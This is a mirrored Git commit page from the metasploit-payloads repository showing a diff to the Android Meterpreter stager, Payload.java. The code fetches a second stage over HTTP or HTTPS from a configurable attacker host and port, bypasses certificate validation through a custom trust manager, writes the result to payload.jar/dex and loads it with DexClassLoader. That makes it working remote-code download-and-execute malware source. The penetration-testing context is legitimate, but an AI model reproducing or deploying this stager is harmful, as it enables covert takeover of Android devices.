github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-02 11:36:22 +01:00
Code Releases Activity

fix http

Browse Source
This commit is contained in:
Tim 2015-05-19 16:14:37 +01:00
parent 6101c78a5b
commit 57adddb803
1 changed files with 11 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

65
java/androidpayload/app/src/com/metasploit/stage/Payload.java
View File

@ -2,34 +2,28 @@ package com.metasploit.stage;
import android.content.Context;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random;
import java.util.concurrent.TimeUnit;
import javax.net.ssl.HttpsURLConnection;
import dalvik.system.DexClassLoader;
public class Payload {
public static final String URL = "ZZZZ ";
public static final String LHOST = "XXXX127.0.0.1 ";
public static final String LPORT = "YYYY4444 ";
public static final String URL = "ZZZZ ";
public static final String RETRY_TOTAL = "TTTT ";
public static final String RETRY_WAIT = "SSSS ";
private static final int URI_CHECKSUM_INITJ = 88;
private static final String AB = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
private static final Random rnd = new Random();
private static String[] parameters;
private static int retryTotal;
private static int retryWait;
@ -91,55 +85,19 @@ public class Payload {
}
}
private static String randomString(int len) {
StringBuilder sb = new StringBuilder(len);
for (int i = 0; i < len; i++) {
sb.append(AB.charAt(rnd.nextInt(AB.length())));
}
return sb.toString();
}
private static int checksumText(String s) {
int tmp = 0;
for (int i = 0; i < s.length(); i++) {
tmp += (int) s.charAt(i);
}
return tmp % 0x100;
}
private static void reverseHTTP() throws Exception {
int checksum;
String URI;
HttpURLConnection urlConn;
String lurl = URL.substring(4).trim();
while (true) {
URI = randomString(4);
checksum = checksumText(URI);
if (checksum == URI_CHECKSUM_INITJ)
break;
}
String FullURI = "/" + URI;
URL url = new URL(lurl + FullURI + "_" + randomString(16));
InputStream inStream;
if (lurl.startsWith("https")) {
urlConn = (HttpsURLConnection) url.openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager")
.getMethod("useFor", new Class[]{URLConnection.class})
.invoke(null, urlConn);
URLConnection uc = new URL(lurl).openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
inStream = uc.getInputStream();
} else {
urlConn = (HttpURLConnection) url.openConnection();
inStream = new URL(lurl).openStream();
}
urlConn.setDoInput(true);
urlConn.setRequestMethod("GET");
urlConn.connect();
DataInputStream in = new DataInputStream(urlConn.getInputStream());
loadStage(in, null, parameters);
urlConn.disconnect();
OutputStream out = new ByteArrayOutputStream();
DataInputStream in = new DataInputStream(inStream);
loadStage(in, out, parameters);
}
private static void reverseTCP() throws Exception {
@ -152,7 +110,6 @@ public class Payload {
}
private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
String path = parameters[0];
String filePath = path + File.separatorChar + "payload.jar";
String dexPath = path + File.separatorChar + "payload.dex";